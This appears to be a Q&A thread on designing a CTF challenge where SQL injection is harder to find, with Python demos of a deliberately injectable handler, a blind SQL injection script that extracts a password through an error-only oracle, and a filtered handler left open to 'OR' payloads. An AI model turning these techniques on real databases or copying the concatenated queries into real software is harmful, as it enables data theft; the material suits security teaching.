I'm doing a CTF application for my final year project. I wanted to craft a SQL injection flag, but I don't want them to be able to simply find the SQLi vulnerability by injecting '. Hence, is there a way to make SQL injection harder but not impossible using PHP?

What exactly do you want to achieve? I can't imagine what you need when you say harder and impossible...
– Akam Apr 23 '13 at 11:57

Pretty much any SQL injection exercise can be both fun and educational, if you're required to determine something else first with another SQL injection, before winning the flag. This something else can be the data structure of the same table, or even of other tables that are unknown but required for the final SQL injection. Or it could be getting data located in another record first, moving the record cursor up and down with previous injections. Or injecting new fields, or bogus records that would trigger stored procedures that aren't sanitized, ... Options are only limited by your imagination really.
– TildalWave Apr 23 '13 at 12:08

3 Answers

Blind SQL injection is probably one of the harder techniques, in that it requires more work. You could make a page that doesn't display any output based on the query, but shows error messages when a query is malformed. The attacker would then be forced to use blind SQLi techniques to attack it.

Of course, an automated tool would break this immediately, since it could automate the entire injection. One interesting way around that would be to have some kind of super-simple image CAPTCHA (no distortion, just a plain image) that the attacker must solve in order to send a query. This would either force them to do it manually, or make them look into OCR techniques.
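As an added illustration of the error-only oracle this answer describes (example code, not from the original answer): Python's sqlite3 stands in for the PHP/MySQL page, the table, user names and flag value are constructed for the demo, and the conditional error comes from SQLite's documented behaviour that abs() of the smallest 64-bit integer raises "integer overflow". The handler never returns row data, only "OK" or "SQL error", and the attacker side shows how little that leaks per request yet how completely the secret still comes out.

```python
import sqlite3

# Constructed demo data (not from the original page): the "flag" is the
# admin password, which the challenge never displays.
SECRET = "fl4g-blind-sqli"


def make_db():
    """Build an in-memory SQLite database standing in for the CTF backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users (name, password) VALUES ('alice', 'hunter2')")
    conn.execute("INSERT INTO users (name, password) VALUES ('admin', ?)", (SECRET,))
    return conn


def vulnerable_lookup(conn, name):
    """Deliberately injectable challenge handler (the PHP page, in Python).

    The rows are never shown.  The only thing the player learns is whether
    the query ran ("OK") or failed ("SQL error"): the error-only oracle the
    answer describes.
    """
    query = f"SELECT id FROM users WHERE name = '{name}'"  # the bug: string concatenation
    try:
        conn.execute(query).fetchall()
        return "OK"
    except sqlite3.Error:
        return "SQL error"


def oracle(conn, condition):
    """Attacker side: evaluate one boolean SQL condition through the oracle.

    -9223372036854775807 - 1 is the smallest 64-bit integer, and SQLite's
    abs() raises 'integer overflow' on it.  Adding 1 when the condition is
    true moves the value back into range, so the injected SELECT errors
    only when the condition is false (or NULL).  UNION puts the probe in a
    SELECT with no FROM, so it runs exactly once regardless of how many
    rows the original WHERE matches.
    """
    payload = (
        "' UNION SELECT abs(-9223372036854775807 - 1 + "
        f"CASE WHEN ({condition}) THEN 1 ELSE 0 END) -- "
    )
    return vulnerable_lookup(conn, payload) == "OK"


def extract_password(conn, user="admin", max_len=64):
    """Recover the target's password one character at a time.

    Length first, then a binary search over the code point of each
    position, so each character costs about seven requests instead of
    one per candidate character.
    """
    target = f"(SELECT password FROM users WHERE name = '{user}')"
    length = next(
        (n for n in range(max_len + 1) if oracle(conn, f"length({target}) = {n}")),
        None,
    )
    if length is None:
        raise RuntimeError(f"password longer than {max_len} characters")

    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 0x7F  # ASCII range is enough for this challenge
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr({target}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    # The obvious probe only tells the player that *something* is wrong.
    print(vulnerable_lookup(db, "'"))        # SQL error
    print(vulnerable_lookup(db, "nobody"))   # OK, indistinguishable from a real user
    print(extract_password(db))              # fl4g-blind-sqli
```

Against MySQL the same idea needs a different error trigger (a conditional subquery that returns more than one row, for instance), but the request pattern is identical, which is why a plain-image CAPTCHA in front of the endpoint is what forces the player to think about automating it rather than just pointing a tool at it.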

My first thought is to limit what characters or regex patterns you look for. You could limit the user input to only certain strings that would still allow for attacks, but would complicate what kind of attacks would work.

I'd say the easiest way to come up with something like this is probably to think of a particular attack you want someone to arrive at and then work backwards. Try to design protection to block everything other than the attack you wish them to perform. It could even be as simple as making it SQL Injection proof but then specifically allowing the desired attack input, though that might be a little too tricky depending on what you are looking for.
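An added example (not from either of the two answers above) that serves both the "limit which strings the input may contain" suggestion and the "work backwards from one intended attack" approach: the deny-list, table, post titles and handler names are assumptions made for the illustration, and Python's sqlite3 stands in for the PHP/MySQL stack in the question. The filter turns the usual quote, comment and UNION probes into a uniform "bad input", but the id is concatenated unquoted, so a bare boolean expression is the one path left open. The parameterised version is included as the baseline the filtered handler is deliberately weaker than.

```python
import re
import sqlite3


def make_db():
    """Constructed demo data (not from the original page): post 3 is the flag
    and is never public, so it can only be read by changing the WHERE clause."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, public INTEGER)")
    conn.executemany(
        "INSERT INTO posts (title, public) VALUES (?, ?)",
        [("Welcome", 1), ("Rules", 1), ("flag-hidden-post", 0)],
    )
    return conn


# Hypothetical deny-list for the challenge: rejects the "'" probe, comment
# markers and UNION/SELECT, so quoting and union tricks get the same
# "bad input" and give no hint that the id is injectable at all.
BLOCKED = re.compile(r"""['";]|--|/\*|\bunion\b|\bselect\b""", re.IGNORECASE)


def show_post(conn, post_id):
    """Challenge handler: filtered, but the intended injection still works.

    The id is interpolated unquoted, so "1 OR 1=1" passes the filter and
    turns the WHERE into (public = 1 AND id = 1) OR 1=1, which returns the
    hidden flag post.  Everything else the filter lets through that is not
    valid SQL collapses into the same "bad input" as filtered input.
    """
    if BLOCKED.search(post_id):
        return "bad input"
    query = f"SELECT title FROM posts WHERE public = 1 AND id = {post_id} ORDER BY id"
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        return "bad input"
    return [title for (title,) in rows]


def safe_show_post(conn, post_id):
    """The injection-proof baseline: type-check the id, then bind it."""
    try:
        pid = int(post_id)
    except ValueError:
        return "bad input"
    rows = conn.execute(
        "SELECT title FROM posts WHERE public = 1 AND id = ? ORDER BY id", (pid,)
    ).fetchall()
    return [title for (title,) in rows]


if __name__ == "__main__":
    db = make_db()
    print(show_post(db, "'"))                            # bad input
    print(show_post(db, "0 UNION SELECT title FROM posts"))  # bad input
    print(show_post(db, "3"))                            # [] (flag post is not public)
    print(show_post(db, "1 OR id=3"))                    # ['Welcome', 'flag-hidden-post']
    print(safe_show_post(db, "1 OR id=3"))               # bad input
```

Working backwards this way also tells you what to test before shipping the challenge: every probe you do not want to work should land in "bad input", the one you do want should reach the flag, and the parameterised handler should reject it, which is the easiest way to confirm the hole is the one you meant to leave.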